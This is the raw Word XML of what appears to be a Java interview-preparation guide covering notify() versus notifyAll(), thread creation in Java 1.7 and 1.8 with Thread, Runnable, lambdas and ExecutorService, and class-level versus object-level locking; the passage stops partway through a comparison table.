    <w:p w14:paraId="171DE5BC"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Using notify() in this situation could cause some threads to wait indefinitely because only one of them will be woken up, and it might not be able to proceed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E930300"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efficient Synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E6D15F"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Example to Illustrate the Difference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD9A69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class SharedResource {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD952A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1E441840" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35630B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throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B6FC5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while (count == 5) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFC94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less than 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD3A0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AC31DF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62217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incremented to: " + count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A9BE2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27F17A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601A626" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="384FF4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decrement() throws InterruptedException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E56F2E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count == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B18D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greater than 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E91B5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6EC82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4CFB2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decremented to: " + count);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164C12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7F75A5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F60EEF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24BBE713" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579C94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2D0C02D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40D547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haredResource resource = new SharedResource();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51321896" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E61AA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incrementThread = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98F1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1582FDB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5D4CB7F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increment();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B42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375B6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5F3AA0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FCF6F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03FCB1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029612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E80309E" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D5DA0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decrementThread = new Thread(() -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4519A3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0399636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2E8788B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decrement();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209498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FAEB6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CAE00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A67D87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2CE8849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F330DC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4A5BB8F" w14:textId="77777777" w:rsidR="00891EBF" w:rsidRPr="005C2C08" w:rsidRDefault="00891EBF" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35190C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incrementThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF13EC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decrementThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E01EDC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B0C89F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B15C77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In this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90CD15"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All() is used instead of notify(), all threads waiting on the monitor will be notified, allowing them to compete for the lock and potentially making the program more responsive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B9C3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69C4AF70"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notify()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if only one thread should be woken up at a time (e.g., when only one thread can process the task).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B4423"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t>Use notifyAll()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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19" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2102F844" w14:textId="77777777" w:rsidR="005A01AE" w:rsidRPr="00CE4B95" w:rsidRDefault="005A01AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="276" w:name="_Toc197867490"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to create threads using java 1.7 and java 1.8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
    </w:p>
    <w:p w14:paraId="6154C3F2" w14:textId="6475D6D8" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8"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0BEE0DD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1. Creating Threads in Java 1.7 (Traditional Approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4696567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n Java 1.7, creating threads was done using two common approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107FC6C9"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tending the Thread class</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F9BF4D"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You can create a new class that extends the Thread class and override its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582C9BE0"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Implementing the Runnable interface</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4264D557"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involves creating a class that implements the Runnable interface and its run() method. Then, you create a Thread object and pass the Runnable instance to its constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315932D6"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Thread Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600197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Thread extends Thread {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE401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454D022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36595A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Thread class");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE09F8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054F314" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FE3BD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054A0DB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Thread thread = new MyThread();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC9C7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6A0C490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45AF87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0FB0CC0"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Runnable Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A25170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Runnable implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF0B23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7BF0F569"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6603C7C3"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Runnable interface");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A135F2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4372B4D" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2384D64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A1E44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Runnable myRunnable = new MyRunnable();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36259F2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myRunnable); // Passing the Runnable object to the Thread constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C56B13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4D9915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9A911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560372C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2. Creating Threads in Java 1.8 (Lambda Expressions and Executor Service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D585C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ith the introduction of </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, we saw the introduction of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which made it easier to handle threads. Java 1.8 doesn't change the way threads are created directly, but it provides more concise, flexible, and powerful tools to manage threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3D554"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Lambda Expressions (Functional Interface)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ABC1D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you can use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to create and pass Runnable instances more easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16385C8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LambdaThreadExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B417CF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6A6390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ing thread using lambda expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A7B19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unnable task = () -&gt; System.out.println("Thread running using Lambda expression");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2455809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340A2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task);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A769BC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343669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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC31F9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79EFBC9" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110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Here, Runnable is a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Functional Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and we use a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lambda Expression</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to implement its run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E0D09"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ExecutorService (Java 1.8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B6E2E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becomes a preferred way to manage threads, as it abstracts thread creation and management behind the scenes. It provides an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xml:space="preserve"> which can handle multiple tasks concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312B2FC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mport java.util.concurrent.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D3BA4E" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="359F2F3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ExecutorServiceExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E2DB2C"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7FEF56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a thread pool with 2 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A83F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ervice executor = Executors.newFixedThreadPool(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53461A29" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="436678E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ubmit tasks to the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38FFD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1 running"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBCF29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2 running"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B2755F" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="464DAF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hutdown the executor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4EDFD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hutdown();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EE9B7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CE117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58022A0" w14:textId="77777777" w:rsidR="000B52A8" w:rsidRPr="005C2C08" w:rsidRDefault="000B52A8" w:rsidP="005C2C08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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Advantages of ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD104A"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Simplifies thread management by abstracting thread creation and handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4326E19E"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utomatically manages a pool of threads, reducing the overhead of creating and destroying threads for each task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AA3241"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llows handling tasks asynchronously and can manage task scheduling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56C8D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mparison:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7564E402"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8C082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class</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Create a class that extends Thread and override the run() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920A6F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Runnable interface</w:t>
      </w:r>
      <w:r w:rsidRPr="005C2C08">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement Runnable and pass it to a Thread object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B133E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se approaches require explicit thread creation and management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D221D21"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20C47BDE"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Use functional interfaces (Runnable, Callable, etc.) with concise syntax for defining tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD0B74F"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A more modern, flexible way to manage a pool of threads and submit tasks for execution asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E152C5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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53BD61"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threads were primarily created using the traditional approaches of extending Thread or implementing Runnable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40952B06"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 xml:space="preserve"> introduces more modern and efficient ways to handle threads using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making the code more concise and manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A0578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ile the Thread and Runnable approach is still valid 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provide a more robust and scalable solution for multi-threading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ED8032" w14:textId="7864B507"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0" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B1ACE" w14:textId="1BD928F0" w:rsidR="00912F46" w:rsidRPr="00CE4B95" w:rsidRDefault="00912F46" w:rsidP="00912F46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="277" w:name="_Toc197867491"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Difference between </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Class level lock and Object level lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="277"/>
    </w:p>
    <w:p w14:paraId="16EE0777" w14:textId="4525BC6F" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00912F46" w:rsidP="00912F46">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Object Level Lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A1106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a single object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF5E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Non-static synchronized methods or synchronized blocks on this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCA73CC" w14:textId="58A643A4" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00822C2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the synchronized instance method on the same object at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC93D4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1C41142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ynchronized void instanceMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFE97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029BB83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2AF7153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3F57C6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BB3613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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    synchronized(this) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4C8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4BA060B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62AACA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4D39E71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08996C">
          <v:rect id="_x0000_i1821" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4163F48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lass Level Lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9240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the Class object itself (i.e., MyClass.class).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD80E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Static synchronized methods or synchronized blocks on MyClass.class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE0FF9" w14:textId="43197967" w:rsidR="00912F46" w:rsidRPr="00912F46" w:rsidRDefault="00A82D33"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synchronized static methods of the class, regardless of how many instances exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7769F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222936D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tatic synchronized void staticMethod() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222AD272"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5FD813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7F6505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1A35D7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344FAF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synchronized(MyClass.class) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185BB4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111C579A"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0759715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0D5DA12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27A30">
          <v:rect id="_x0000_i1822" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFCDFE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882"/>
        <w:gridCol w:w="2630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="62C2C387" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F26E010"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="616E874C"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Object Level Lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6849655E"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Class Level Lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="55C35D5B" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64D3FFF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cope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="340F6C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pecific object instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EB3760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Class (i.e., all instances)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="3C864C56" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42E1471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Used With</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5771582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instance methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="324FDAB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static methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="54F7B20B" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="072B5F61"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Lock Obtained On</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F6C17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this</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0667BE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MyClass.class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00912F46" w:rsidRPr="00912F46" w14:paraId="59A0B4BE" w14:textId="77777777" w:rsidTr="00912F46">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D7626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ffects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
